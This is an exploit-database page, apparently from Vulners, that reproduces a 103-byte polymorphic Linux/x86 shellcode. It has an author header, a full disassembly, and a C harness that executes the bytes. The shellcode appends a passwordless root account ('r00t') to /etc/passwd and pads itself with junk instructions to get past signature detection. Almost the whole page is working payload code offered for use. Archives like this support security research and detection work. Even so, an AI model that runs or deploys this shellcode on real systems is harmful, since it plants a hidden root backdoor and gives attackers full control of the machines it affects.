Vulners
Lucene search
Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)
/*
# Shellcode Title: Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net
# Tested on: Linux/x86
# gcc -o poly_adduser_shellcode -z execstack -fno-stack-protector poly_adduser_shellcode.c
*/
/****************************************************
Disassembly of section .text:
08048060 <_start>:
8048060: 90 nop
8048061: 58 pop eax
8048062: 29 db sub ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 66 b9 01 04 mov cx,0x401
804806a: 51 push ecx
804806b: 5f pop edi
804806c: 53 push ebx
804806d: 6a 06 push 0x6
804806f: 58 pop eax
8048070: 48 dec eax
8048071: 68 2f 2f 70 61 push 0x61702f2f
8048076: 68 37 13 37 13 push 0x13371337
804807b: 68 73 73 77 64 push 0x64777373
8048080: 68 2f 65 74 63 push 0x6374652f
8048085: 5a pop edx
8048086: 5e pop esi
8048087: 5f pop edi
8048088: 5f pop edi
8048089: 56 push esi
804808a: 57 push edi
804808b: 52 push edx
804808c: 89 e3 mov ebx,esp
804808e: cd 80 int 0x80
8048090: 50 push eax
8048091: 5a pop edx
8048092: 92 xchg edx,eax
8048093: 89 c3 mov ebx,eax
8048095: 6a 05 push 0x5
8048097: 31 d2 xor edx,edx
8048099: 87 db xchg ebx,ebx
804809b: 6a 0c push 0xc
804809d: 58 pop eax
804809e: 5a pop edx
804809f: 92 xchg edx,eax
80480a0: 52 push edx
80480a1: 90 nop
80480a2: 68 30 3a 3a 3a push 0x3a3a3a30
80480a7: 56 push esi
80480a8: 5e pop esi
80480a9: 68 3a 3a 30 3a push 0x3a303a3a
80480ae: 68 72 30 30 74 push 0x74303072
80480b3: 48 dec eax
80480b4: 89 e1 mov ecx,esp
80480b6: 6a 01 push 0x1
80480b8: cd 80 int 0x80
80480ba: 6a 04 push 0x4
80480bc: 58 pop eax
80480bd: 83 c0 02 add eax,0x2
80480c0: cd 80 int 0x80
80480c2: 31 c0 xor eax,eax
80480c4: 40 inc eax
80480c5: cd 80 int 0x80
****************************************************/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x90\x58\x29\xdb\x31\xc9\x66\xb9\x01\x04\x51\x5f\x53\x6a\x06\x58\x48\x68\x2f\x2f\x70\x61\x68\x37\x13\x37\x13\x68\x73\x73\x77\x64\x68\x2f\x65\x74\x63\x5a\x5e\x5f\x5f\x56\x57\x52\x89\xe3\xcd\x80\x50\x5a\x92\x89\xc3\x6a\x05\x31\xd2\x87\xdb\x6a\x0c\x58\x5a\x92\x52\x90\x68\x30\x3a\x3a\x3a\x56\x5e\x68\x3a\x3a\x30\x3a\x68\x72\x30\x30\x74\x48\x89\xe1\x6a\x01\xcd\x80\x6a\x04\x58\x83\xc0\x02\xcd\x80\x31\xc0\x40\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Sep 2018 00:00Current